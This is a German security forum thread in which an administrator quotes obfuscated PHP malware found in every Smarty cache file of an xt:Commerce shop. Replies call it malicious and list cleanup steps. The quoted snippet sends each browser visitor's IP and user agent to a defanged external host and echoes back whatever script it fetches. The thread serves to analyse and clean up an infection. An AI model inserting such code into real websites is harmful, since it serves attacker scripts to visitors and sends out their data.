Trojaner-Board - Offen Schadsoftware auf Webserver (PHP)

Trojaner-Board (https://www.trojaner-board.de/)

- Alles rund um Mac OSX & Linux (https://www.trojaner-board.de/alles-rund-um-mac-osx-linux/)

- -

Schadsoftware auf Webserver (PHP) (https://www.trojaner-board.de/153813-schadsoftware-webserver-php.html)

Schadsoftware auf Webserver (PHP)

Auf einem Webserver fand ich folgenden Schadcode:

PHP-Code:

   #c18fce#

error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_j6451) && !preg_match ('/bot/i', $wp_j6451))){

$wp_j096451="hxxp://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_j6451);

$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_j096451);

curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_6451j = curl_exec ($ch); curl_close($ch);}

if ( substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }

#/c18fce#

Falls jemand eine Ahnung hat, was das ist, ob es in Zusammenhang mit anderen Schweinereien auftritt, und ob ich nun alles auf den Kopf stellen muss, wäre ich für zweckdienliche Hinweise dankbar.

Die Sache fiel auf, weil das obige Snippet mangels Empfänger nicht mehr nach Hause telefonieren konnte. Die dadurch entstehende Verzögerung führte zu Ladezeiten von 2-3 Minuten statt der üblichen 5-10 Sekunden.

Der Codeblock war mit unterschiedlichen Kommentaren in allen Smarty-Cachefiles eines xt:Commerce-Shops enthalten.

Hinweis: Ich betreibe derlei Geschichten gewerblich, habe mir die Hinweise für neue Postings durchgelesen, kann aber als reiner Linux-User die angegebenen Programme nicht betreiben und infolgedessen auch die gewünschten Logs nicht liefern.

Falls ich als Neuling hierzuforum etwas übersehen haben sollte, nehme ich auch dazu Hinweise entgegen. Danke.

Hallo ShopNix und :hallo: ,

nun, hier handelt es sich eindeutig um Schadcode! :eek:

Die Vorgangsweise in solchen Fällen dürfte ja bekannt sein:

1) Backup der vorhandenen Dateien machen zu späteren Analysezwecken

2) Löschen des gesamten Webspace und Restore einer sauberen Installation durchführen

3) Alle Kennwörter ändern

4) Rücksprache mit Provider/Hoster wegen der Infektion anderer Websites

Liebe Grüße, Alois

Post © Alois 2014 – Alle Rechte vorbehalten – kein Teil darf in irgendeiner Form ohne schriftliche Genehmigung des Autors kritisiert werden! :aufsmaul:

Hallo Alois,

vielen Dank für den Willkommensgruß.

Die Standard-Vorgehensweise hilft mir an der Stelle leider nicht weiter, denn die eigentliche Infektion des Webspace liegt nach Angaben des Betreibers schon längere Zeit zurück. Demnach wurde der Webspace gesäubert und alles war gut.

Ich weiß leider auch nicht, was da alles installiert ist, sondern habe mich ausschließlich um die bemängelten Ladezeiten gekümmert und dabei den o. a. Schadcode entdeckt.

Was ich fand, ist wohl nur ein Überbleibsel, und ich hätte gern daraus auf die Ursache zurückgeschlossen um eventuell bekannte Zusammenhänge nachzuverfolgen.

Für den Shop ist das kein Thema, da erfolgt eine komplette Neuinstallation zum Zwecke der Migration auf aktuellen Softwarestand. Sorgen machen mir die weiteren Komponenten auf der Website, die ich nicht kenne, und für die ich keinen Auftrag habe.

Gern geschehen! :)

Zitat:

Sorgen machen mir die weiteren Komponenten auf der Website, die ich nicht kenne, und für die ich keinen Auftrag habe.

Nun, da hilft eigentlich nur eine Rück- und/oder "Aussprache" mit dem betreffenden Hoster - sorry, dass ich nicht mehr dazu sagen kann, aber eine "Eigenanalyse" ist hier weder empfehlenswert noch möglich (ist ja nicht deine Seite, oder?)

Liebe Grüße, Alois

Der Hoster will nicht mit mir schwätzen, weil ich nicht sein Kunde bin, der Betreiber versteht anscheinend nicht, wovon ich rede und ich habe keine große Lust, mich mit Ignoranten herumzuschlagen.

Also dachte ich, ich poste das Ding mal an qualifizierter Stelle. Wenn mir jemand zweckdienliche Hinweise geben kann, dann verfolge ich die, andernfalls wasche im meine Hände in Unschuld. :heilig:

Hallo ShopNix,

nun, da der bzw. die Hacker ihren Server ja inzwischen abgeschaltet haben (wenn ich dich richtig verstanden habe) - was soll´s ? :glaskugel:

EDIT: Übrigens ist der Code recht raffiniert geschrieben - das Schadscript wird nur bei herkömmlichen Browsern und nicht bei Bots ausgeführt und an einem Block ist auch deutlich zu erkennen, dass die "Verseuchung" gelungen ist.....

Liebe Grüße, Alois